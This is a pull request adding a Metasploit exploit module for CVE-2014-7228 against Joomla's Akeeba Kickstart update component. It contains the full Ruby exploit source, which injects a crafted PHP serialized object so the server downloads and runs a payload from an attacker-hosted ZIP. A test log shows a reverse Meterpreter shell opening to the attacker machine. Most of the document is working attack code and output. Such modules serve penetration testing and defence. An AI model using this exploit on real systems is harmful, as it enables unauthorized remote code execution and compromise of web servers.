### PR TITLE
CVE-2014-7228 Joomla/Akeeba Kickstart RCE

### DIFF
--- a/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
@@ -50,7 +50,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
       register_options(
         [
-          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla'])
+          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
+          OptInt.new('HTTPDELAY',    [false, 'Seconds to wait before terminating web server', 5]),
+          OptString.new('URIPATH', [true, 'The base path to the ZIP file', 'file.zip'])
         ], self.class)
 
   end
@@ -66,8 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
     return Exploit::CheckCode::Safe
   end
 
-  def exploit
-    resource_uri = random_uri + '.zip'
+  def primer
     srv_uri = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
 
     php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
@@ -79,18 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
     zip_file.add_file(php_filename, payload.encoded)
     @zip = zip_file.pack
 
-    print_status("Starting up our web service on #{srv_uri} ...")
-    start_service(
-      {'Uri' =>
-        {
-          'Proc' => Proc.new { |cli, req|
-            on_request_uri(cli, req)
-          },
-          'Path' => resource_uri
-        }
-      }
-    )
-
+    # First step: call restore to run _prepare() and get an initialized AKFactory
     print_status("Sending our payload to #{peer}")
     res = send_request_cgi({
       'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
@@ -104,6 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with("Error while injecting PHP serialized object : " + res.body)
     end
 
+    # Second step: modify the currentPartNumber within the returned serialized AKFactory
     json = /###(.*)###/.match(res.body)[1]
     b64encoded_prepared_factory = JSON.parse(json)['factory']
     prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
@@ -122,7 +113,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
     })
 
-    handler
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['HTTPDELAY']) { super }
+    rescue Timeout::Error
+      # When the server stops due to our timeout, this is raised
+    end
   end
 
   # Handle incoming requests from the server

--- a/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Joomla / Akeeba Kickstart Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and
+        earlier 3.x versions, 3.3.0 through 3.3.4 versions. The vulnerability more
+        specifically affects the Akeeba component, which is responsible for Joomla!
+        updates. Nevertheless it is worth to note that this vulnerability is only present
+        during the update of the Joomla! CMS.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Johannes Dahse',               # Vulnerability discovery
+          'us3r777 <us3r777[at]n0b0.so>'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-7228' ],
+          [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
+          [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
+          [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
+        ],
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
+        ],
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 29 2014",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla'])
+        ], self.class)
+
+  end
+
+  def check
+    send_request_cgi(
+      'uri'    => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
+    )
+    if res and (res.code == 200)
+        return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    srv_host = srvhost_addr
+    srv_port = datastore['SRVPORT']
+    resource_uri = random_uri + '.zip'
+    srv_uri = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+
+    php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"'+ "\x00" + 'AKFactory' + "\x00" + 'varlist";a:4:{s:17:"kickstart.enabled";b:1;s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";s:24:"kickstart.setup.filetype";s:3:"ZIP";}}'
+
+    php_filename = rand_text_alpha(8 + rand(8)) + '.php'
+
+    # Create the zip archive
+    print_status("Creating archive with file " + php_filename)
+    zip_file = Rex::Zip::Archive.new
+    zip_file.add_file(php_filename, payload.encoded)
+    @zip = zip_file.pack
+
+    print_status("Starting up our web service on #{srv_uri} ...")
+    start_service(
+      {'Uri' =>
+        {
+          'Proc' => Proc.new { |cli, req|
+            on_request_uri(cli, req)
+          },
+          'Path' => resource_uri
+        }
+      }
+    )
+
+    print_status("Sending our payload to #{peer}")
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
+      'vars_get'  => {
+        'task'    => 'stepRestore',
+        'factory' => Rex::Text.encode_base64(php_serialized_akfactory)
+      }
+    })
+
+    unless res && res.body =~ /###(.*)###/
+      fail_with("Error while injecting PHP serialized object : " + res.body)
+    end
+
+    json = /###(.*)###/.match(res.body)[1]
+    b64encoded_prepared_factory = JSON.parse(json)['factory']
+    prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
+    modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
+      'vars_get'  => {
+        'task'    => 'stepRestore',
+        'factory' => Rex::Text.encode_base64(modified_factory)
+      }
+    })
+    register_files_for_cleanup(php_filename)
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
+    })
+
+    handler
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    if (not @zip)
+      print_error("A request came in, but the ZIP archive wasn't ready yet!")
+      return
+    end
+
+    print_status("Sending the WAR archive to the server...")
+    send_response(cli, @zip)
+  end
+
+end

--- a/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
@@ -67,8 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    srv_host = srvhost_addr
-    srv_port = datastore['SRVPORT']
     resource_uri = random_uri + '.zip'
     srv_uri = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
 

--- a/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_akeeba_exec.rb
@@ -72,8 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
     resource_uri = random_uri + '.zip'
     srv_uri = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
 
-    php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"'+ "\x00" + 'AKFactory' + "\x00" + 'varlist";a:4:{s:17:"kickstart.enabled";b:1;s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";s:24:"kickstart.setup.filetype";s:3:"ZIP";}}'
-
+    php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
     php_filename = rand_text_alpha(8 + rand(8)) + '.php'
 
     # Create the zip archive
@@ -135,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    print_status("Sending the WAR archive to the server...")
+    print_status("Sending the ZIP archive to the server...")
     send_response(cli, @zip)
   end
 


### PR DESCRIPTION
# Description

This module exploits a vulnerability found in Joomla! by Johannes Dahse. It affects versions through 2.5.25, 3.2.5 and earlier 3.x versions, 3.3.0 through 3.3.4 versions. The vulnerability more specifically affects the Akeeba component, which is responsible for Joomla! updates. Nevertheless it is worth to note that this vulnerability is only present during the update of the Joomla! CMS.
# Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7228
http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html
https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html
http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/
# Reproduction
- [x] Install Apache / Php / Mysql
- [x] Install a vulnerable Joomla!
- [x] Create the file administrator/components/com_joomlaupdate/restoration.php (the content doesn't matter, the file presence is enough to make akeeba think the software is updating)
# Test

Tested on Joomla! 3.3.4

```
2014-10-09 18:55:24 +0200 S:5 J:0 > use exploit/unix/webapp/joomla_akeeba_exec 
2014-10-09 18:55:25 +0200 S:5 J:0 exploit(joomla_akeeba_exec) > set TARGETURI  /joomla3.3.4
TARGETURI => /joomla3.3.4
2014-10-09 18:55:30 +0200 S:5 J:0 exploit(joomla_akeeba_exec) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
2014-10-09 18:55:34 +0200 S:5 J:0 exploit(joomla_akeeba_exec) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
2014-10-09 18:56:12 +0200 S:5 J:0 exploit(joomla_akeeba_exec) > run

[*] Started reverse handler on 192.168.56.1:4444 
[*] Creating archive with file MfJjoFyjFDlLrWo.php
[*] Starting up our web service on http://192.168.56.1:8080/Nctu3KE.zip ...
[*] Using URL: http://0.0.0.0:8080/Nctu3KE.zip
[*]  Local IP: http://192.70.106.83:8080/Nctu3KE.zip
[*] Sending our payload to 192.168.56.101:80
[*] Sending the ZIP archive to the server...
[*] Sending the ZIP archive to the server...
[*] Sending stage (40551 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:55794) at 2014-10-10 09:56:55 +0200
[+] Deleted MfJjoFyjFDlLrWo.php
[*] Server stopped.

meterpreter > sysinfo 
Computer    : debian
OS          : Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686
Meterpreter : php/php
```
